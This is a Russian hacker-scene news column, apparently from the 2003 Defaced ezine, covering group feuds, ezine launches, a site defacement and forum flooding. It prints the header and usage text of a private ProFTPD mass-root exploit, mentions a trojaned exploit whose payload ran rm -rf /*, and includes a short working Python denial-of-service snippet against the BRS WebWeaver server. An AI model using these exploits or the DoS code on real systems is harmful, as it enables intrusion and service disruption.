_-_-_-_- Scene newz -_-_-_-_
-_-_-_-_ -==-==-==- _-_-_-_-

[1]  Шум вокруг Defaced
[2]  Мы закрыли ZudTeam
[3]  m00.void.ru/m00/ is really private??
[4]  Три новых езина
[5]  Кто подставил кролика роджера??
[6]  Сайт nerf отдефейсили
[7]  Управление "Р" и  флуд
[8]  Net Poison was closed
[9]  m00d4rk и его k-3r33t 5pl01t


[1] Шум вокруг Defaced

Выход  Defaced  #3  заставил подняться на поверхность самые потаенные, я бы даже
сказал,  глубинные,  каловые  массы  рунета. Критические постинги стали сыпаться
один  за другим без останова. Что же именно стало так неприятно и привлекательно
одновременно  в  этом журнале для ``ламмеров'' всем этим людям?? Это загадка. Но
некоторые  предположения  можно  сделать,  исходя  из  содержания  комментариев,
которых, кстати, довольно много. Особо хочется отметить следующие три публикации:


- www.void.ru/content/1164

Заметка  опубликована durito по собственным соображениям. Там не было ничего, но
содержание  третьего  номера.  Заметку,  в  прочем,  через  некоторое  время, по
просьбам  телезрителей,  удалили,  ибо  не  круто  )). На самом деле потому, что
начался банальный флейм.

Тем не менее, само сообщение со всеми комментариями можно посмотреть здесь:

- http://void.ru/?do=deleted_content&id=1164
- http://f0kp.iplus.ru/temp/d/void.ru


- www.securitylab.ru/41037.html

Это  комментарий,  который  был  сначала  опубликован  в форуме Defaced. Автор -
nometter <[email protected]>, также известный как d4rkgr3y [ thx 2 c0d3x за разведку
].  Почему  форума  журнала было недостаточно, и почему этот небольшой опус [ от
слова  ``опустить''  ]  был  вынесен  на  более  широкую, попсовую арену, вполне
понятно.  Из всего что накомментировали в форуме секлаба, особо хочется выделить
одно:  какой-то  умник  орал,  мол, defaced должны выплатить секлабовцам лаве за
рекламу  журнала )). Непонятно только почему мы, а не d4rkgr3y - он же запостил,
пусть  и платит. А если уж на то пошло, то это секлаб должен нам за рекламу, вот
только  мы  не  жадные  -  пусть  рекламируется  for free - все равно это ему не
поможет.


- www.nteam.ru/news/view/?id=32

На самом деле статья совсем не о defaced - она о состоянии сцены в целом, однако
в  комментариях  обсуждался  в  основном  журнал. Особо преуспели в этом d4 (aka
d4rkg4y),  lovchy и c0d3x. Ловчий говорит, что он ``клиент'' и что ему подсунули
``некачественный  товар''. Какой к черту клиент и какой товар, неуважаемый г-н [
не обязательно значит ``господин'' ] Безруков. Клиент - это тот кто платит, а то
что  вы  так  усердно  критикуете,  абсолютно  бесплатно  и  читать вас никто не
заставляет.  Поэтому  если вам что-то и не понравилось, просто смолчите об этом.
Но  вышеуказанного  г-на даже не пришлось ловить на слове - явное несоответствие
его  заявлений  в  сообщении,  которое  пришло на ящик журнала и тех, что были в
форуме  nt,  говорит о том, что на все его замечания можно не обращать внимания,
поскольку смысла в них не более чем хлебных крошек в курином дерьме.

Опять  же,  в  силу  неработоспособности  nteam.ru в настоящее время, посмотреть
статью и комментарии можно на:

- http://f0kp.iplus.ru/temp/d/nteam.ru

[ там не самый свежий бэкап, но все что нужно есть ]




[2] Мы закрыли ZudTeam

Именно  так  почему-то  склонны  считать многие, главным образом сам wolf. Скажу
лишь, что это просто гон - после ухода костяка команды, она бы не продержалась в
любом  случае,  потому  что  вульфу  это  все не по зубам. Зато для него хороший
предлог,  чтобы распустить остатки команды - мол, чувака обидили, типа он ничего
не  мог сделать. Причиной, естесственно, принято называть статью, опубликованную
в D3. Лично мне плевать кто там что думает и пишет, по крайней мере это ну никак
не  могло  бы  стать причиной развала команды. Отсюда выводы. Нижеследующее было
вывешено на главное странице zudteam.org

from zudteam.org import index.htm

"""
Я закрываю проект. Это нужно было сделать еще в июле. Уже тогда было понятно,что
команде,  долго  не  продержаться.Могу  сказать,что  у  нас  был  очень  сильный
состав.Хорошие  люди. Дружественная атмосфера. Но в команде были и поганые люди.
Точнее один.Его звали Дима. Для общественности nimber. Именно он и развалил все.
Он  начал  кидать  понты  и  гнать  на  всех.  Именно ему первому не понравилась
ситуация  в  команде.  И  он перешел. Забрав с собой грамотныйх людей. Я конечно
могу  выложить  тут  его  фотку,  телефон  и прочее. Пусть до него дойдет,что он
просто  лох.  И  будет  мне  обязан.  И это не шантаж. Его статья в дефейсед-это
просто  наглость  и  идиотизм.  Я  не  буду ничего объяснять. Все кто меня знают
поймут.  Дима-  ты ничтожество. Запомни на всегда. После команды остается только
irc     канал     #zudteam    (irc.chatnet.ru/irc.dalnet.ru)    И    ZUD    ZINE
http://content.mail.ru/pages/p_9445.html  Я никуда не пропадаю,а буду заниматься
сам и своими делами. На последок хочу сказать спасибо этим людям:
 
Zet,Iww,unix,Pirog,Demon,Xspyd3x,dux,JLx,Over_G,Khmelic и многим другим.

Большое спасибо всем.Удачи. Увидимся.
"""



[3] m00.void.ru/m00/ is really private??

Наверно  многие  из вас слышали о наличии private base, расположенной по адресу,
указанному  в  хидере  новости.  Некоторые,  возможно, узнали об этом из статьи,
опубликованной  на  http://www.nteam.ru/articles/privatezonez/  и  имеют желание
знать,  что  же там лежит. На самом деле доступ получить может любой желающий, а
не  только  избранные.  Но  нужно ли оно вам? Ничего такого, чего нельзя было бы
найти  в  инете,  там  нет  - просто там чуть более модернизированные версии уже
публиковавшихся  эксплоитов.  То  есть,  из  всех адд-онов можно наблюдать лишь:
брутфорсер  ret_addr, сканер сервисов и автоэксплойтинг [ в случае эксплоита для
proftpd  ]  и  так далее, что вы сможете и сами сделать без труда. Вот заголовок
одного из этих 3r33t 0hd4y sh17:


/* proftpd_put_down2~m00.c
 *
 *       ProFTPD 1.2.7 - 1.2.9rc2 mass autoroot exploit
 *                 by m00 Security // m00.void.ru
 *
 *  Private version of proftpd_put_down.c by Haggis
 *
 *  History:
 *  - ISS X-Force posted information about "ProFTPD
 *   ASCII File Remote Compromise Vulnerability" [24/9/2003]
 *  - ProFTPd remote root exploit by bkbll [7/10/2003]
 *  - More powerful proftpd_put_down.c by Haggis [14/10/2003]
 *  - mass proftpd_put_down2~m00.c exploit by m00 Security
 *   [01/11/2003]
 *
 *  Tested on SuSE 8.0, 8.1 and RedHat 7.2/8.0
 *  it works quite well... the RedHat boxes
 *  works in the 0xbffff2xx stack region;
 *  the SuSE boxes were somewhat earlier
 *  in the stack space - around 0xbfffe8xx.
 *
 *  Greetz:
 *   - nerF security team // www.nerf.ru
 *   - Limpid Byte // lbyte.sysdrop.org
 *   - priv8security // www.priv8security.com
 *   - UHAGr // www.uhagr.com
 *   - and other ppl from #m00sec and #nerf (EFnet) that
 *     we like and respect.
 *
 *  By rash [[email protected]] and d4rkgr3y [[email protected]]
 *
 *           THIS IS UNPUBLISHED m00 EXPLOIT CODE
 *                    KEEP IT PRIVATE
 */

А это вывод программы после запуска:

@----------------------------------------------@
 ProFTPD 1.2.7 - 1.2.9rc2 remote r00t exploit
    by Haggis ([email protected])

                  m00 EDITION

        THIS EXPLOIT CODE IS NOW PRIVATE
@-----------------------------------------------@

Usage: ./scan -s <start ip> -e <end ip> [options]
Arguments:
      -c <count> - count of connections for ip-range scan [30]
      -t <seconds> - timeout for each connection [3]
      -v - be more verbose
      -n - don't beleave FTP banner (try to exploit every ftpd) hmm
      -u <username> - [anonymous]
      -p <password> - [[email protected]]
      -l <local ip address> - interface to bind to
      -U <path> - specify upload path, eg. /incoming
      -P <port> - port number of remote proftpd server
      -S <address> - start at <address> when bruteforcing

Поскольку  nteam.ru  временно  отдыхает,  прочесть  вышеупомяную статью можно по
адресу http://f0kp.iplus.ru/temp/d/private_zonez




[4] Три новых езина

С  момента выхода D3 вышло аж целых три новых электронных журнала. Вот немного о
них мы и расскажем.

Feeling  of  Digital  Stream's  [  FDS  ],  выпускается ребятами из Казахстана -
b3$t_m0w1  и  Scorpio. В общем журнал довольно неплохо сделан. Начиная дизайном,
заканчивая контентом. Тематика статей журнала весьма разнообразна - присутствуют
отличные  материалы по x.25, криптографии [ похоже авторы учатся на каком-нибудь
крипто-факе  )  ],  протоколам и многому другому. Радует также наличие множества
кода  на python, только не стал бы журнал еженедельным справочником python ;). В
настоящее время доступно уже три выпуска этого журнала. Рекомендуем!!

Официальный сайт журнала: www.feelds.by.ru


ptz\Ezine  издается  птзхакерами  и  доступен,  естесственно,  где-то  на  сайте
ptzhack.net )). Особо ничего сказать не могу, так как не было достаточно времени
чтобы  с  ним ознакомиться. Авторы: snip3, Pirog, rust-resisting, ]X[dm, [r]007,
s1Dr3x, OldRastaman.

 
Ну  и  третий,  который вышел совсем недавно - называется DarGON Magazine. Здесь
Dark  Eagle  и Unknown Author учат читателя писать service grabber'ы на delphi +
присутствует несколько док с увядающего void.ru
В  интре  косвенный  намек на то, какое же дерьмо этот defaced и насколько жизнь
изменилась  к  лучшему с появлением DarGON )). Я даже в один момент подумал, что
DarGON значит ``Defaced are GON'' :).

Официальный сайт журнала: www.dargon-ezine.by.ru


В  форуме  npoison  прочитал сообщение чела по имени movl, который призывает или
объявляет   о   создании   нового  журнала  под  его  предводительством..  Самое
интересное, что этот movl.. в прочем ладно )). Будем ждать.

from http://www.npoison.ru/ import ?id=12

"""
Нам нужны люди. Мы решили создать сетевой zine, который будет посвящен security,
хакингу, фрикингу, вирьмейкингу, ос windows, ос unix, coding perl, c, asm, php и
мн.  др.  Причем  проект  не должен быть похож на xakep.ru and defaceD. Недолжно
быть  никаких статей типа 'полное руководство по взлому гостевух и чатов', а так
же  передраных  статей,  все исключительно свое! Зин планируется выпускаться 2-а
раза в месяц. Кто Заинтересован пишите на [email protected] Ответим на любое мыло
"""
 
Мля, defaced всем поперед глотки встал.. 

Эта, как там говорится.. дурной пример заразителен ).




[5] Кто подставил кролика роджера??

22.11.2003  в багтрак свалился m00-mod_gzip.c от d4rkgr3y <[email protected]>.
Эксплоит являет собой несколько модифицированную версию 85mod_gzip.c by xCrZx //
[email protected]  -  добавлено  несколько  новых  ret_addr для различных
linux  flavours  ну  и  главный  шеллкод заменен кодом, выполняющим rm -rf /* на
машине человека, его запустившего.
По  информации  с  муры  [  www.m00.ru ] - это подстава, эксплоит они, якобы, не
посылали,  но  насколько это верно, судить сложно, так как никто там не вызывает
доверия.  Надеюсь,  что  это  был  последний постинг в рассылку от этой команды,
которая, похоже, уже успела обзавестись первыми фэнами )).
  
Код самого эксплоита можно взять на http://m00.void.ru/message и на пакетсторме.




[6] Сайт nerf отдефейсили

В  ночь  с  15  на  16  сентября  nerf.ru,  который хостится на машине ech0, был
изнасилован  изнутри,  то  есть за счет неверной конфигурации машины при наличии
легального локального доступа. Если я все правильно понял, то это были ребята из
некогда популярной dev/ice crew.
Более  подробно  читайте на http://www.shit.ru/_files/nerf.txt, точнее наоборот, 
http://www.nerf.ru/_files/shit.txt

ЗЫ. в курсе, что новость малость запоздала, но я только недавно это увидел ).




[7] Управление "Р" и  флуд

Неизвестный  хакИр  зафлудил  форум  управления  "Р" при ГУВД Самарской области.
Похоже, что это кто-то из DSTeam [ Disarm Samara Team // www.dsteam.best-host.ru
]. Сами результаты можно наблюдать, к примеру, здесь:

www.p.samara.ru/forum/index.asp?qs=101




[8] Net Poison was closed

Официально  команда  Net  Posion  была  закрыта,  хотя  по  их  старому адресу [
www.npoison.ru  ]  доступен  форум,  в  котором  все прежние участники вроде как
активны и даже чего-то там делают.




[9] m00d4rk и его k-3r33t 5pl01t

Итак, имеем следующее: http://m00.void.ru/adv/adv004.txt
Читаем  текст  адвисори.  BRS  WebWeaver remote DoS vulnerability. При получении
длинного  значения  в поле User-Agent, http сервер валится и вешает систему [ из
фара  процесс  убить не пробовал?? у меня оно ничего не вешает ]. Теперь смотрим
эксплоит:

char request[50150] =
		"GET /m00-r0cz HTTP/1.0\n"
		"Accept: */*\n"
		"Accept-Language: jp\n"
		"Accept-Encoding: gzip, deflate\n"
		"Host: m00security.org\n"
		"User-Agent: ";

Скажите  мне  кто-нибудь,  нахрена  здесь  все  эти  Accept-*, если сказано, что
эксплойтить  будем  через User-Agent - разве WW не принимает неполные пакеты или
не  было  времени  разобраться  как  удалить  из  l33t_sp10it_template.c  лишние
строки??  В  первой строке запроса используется версия протокола 1.0 [ webweaver
не умеет HTTP/1.1 ] , зачем тогда писать поле Host: ??
Затем идет что-то совсем непонятное моему разуму:

     <shit skipped>

	//memset((request+98),0x41,c);
	memset((request+strlen(request)),0x41,c);
	/* l33t ;] */
	request[strlen(request)] = 0x0a;
	request[strlen(request)] = 0x43;

     </shit skipped>

Очччень оптимизированный код )). И это вместо того чтобы просто, не выделываясь,
написать  \nConnection:  Keep-Alive\n\n  [  что можно не писать вообще )) ] - за
счет  этого разбавили код еще одним килобайтом мусора. Епта, дарк, пара строк на
питоне:

        import socket
        h=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        h.connect(('localhost',80))
        h.send('GET /m00_sucks HTTP/1.0\r\n')
        h.send('User-Agent: %s\n\n' % ('a'*50000))
        h.close()

Кстати, если передать больше байт в поле [ 500K работает, точное число лень было
вычислять  ] User-Agent, то сервер не потухнет, а просто порежет из лога IP.. Но
на самом деле там есть и более интересные атаки [ типа free disk space takeover,
memory leakage ] - если разрулить, получится еще два элитных адвисори, дерзай ).
Короче понты одни и размазывание соплей по стене, стоило ли это времени, которое
было потрачено на написание этого кода??

.:EOF:.